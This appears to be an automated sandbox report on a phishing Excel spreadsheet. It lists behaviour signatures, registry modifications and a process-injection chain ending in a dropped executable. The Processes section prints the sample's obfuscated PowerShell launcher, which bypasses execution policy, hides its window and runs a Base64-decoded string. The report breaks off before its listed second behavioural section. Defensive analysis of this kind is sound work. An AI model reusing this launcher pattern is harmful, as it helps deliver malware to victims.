Malware Analysis Report

2025-01-18 23:29

Sample ID: 240626-vs4xtstgrg
Target: New Project 7V3655511.xls
SHA256: 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64
Tags: phishing
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64

Threat Level: Known bad

The file New Project 7V3655511.xls was found to be: Known bad.

Malicious Activity Summary

phishing

Process spawned unexpected child process

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Detected phishing page

Enumerates physical storage devices

Modifies registry class

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-26 17:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-26 17:16

Reported: 2024-06-26 17:18

Platform: win7-20240221-en

Max time kernel: 149s

Max time network: 150s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Executes dropped EXE

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Users\Admin\AppData\Roaming\igccu.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
--- | --- | --- | ---
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Detected phishing page

Tags: phishing

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
--- | --- | --- | ---
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

Tags: adware, spyware

Description | Indicator | Process | Target
--- | --- | --- | ---
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies registry class

Description | Indicator | Process | Target
--- | --- | --- | ---
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
--- | --- | --- | ---
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\igccu.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
--- | --- | --- | ---
PID 2436 wrote to memory of 2780 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 2780 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 2780 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 2780 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2884 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2884 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2884 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2884 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2884 wrote to memory of 1656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2884 wrote to memory of 1656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2884 wrote to memory of 1656 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1656 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1656 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1656 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1656 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2884 wrote to memory of 676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2884 wrote to memory of 676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2884 wrote to memory of 676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2884 wrote to memory of 676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\igccu.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowErShelL -EX BYpAss -nOp -W 1 -c DEviCEcrEdentIALDEpLoYment ; IEx($(iEx('[SYSTEm.TExt.eNcOding]'+[cHAr]58+[Char]58+'UtF8.gETSTRinG([SyStEm.CoNVErT]'+[cHAr]0X3A+[chaR]58+'FroMBaSE64sTring('+[cHar]0X22+'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'+[cHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowErShelL -EX BYpAss -nOp -W 1 -c DEviCEcrEdentIALDEpLoYment ; IEx($(iEx('[SYSTEm.TExt.eNcOding]'+[cHAr]58+[Char]58+'UtF8.gETSTRinG([SyStEm.CoNVErT]'+[cHAr]0X3A+[chaR]58+'FroMBaSE64sTring('+[cHar]0X22+'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'+[cHar]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hrpecqqj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

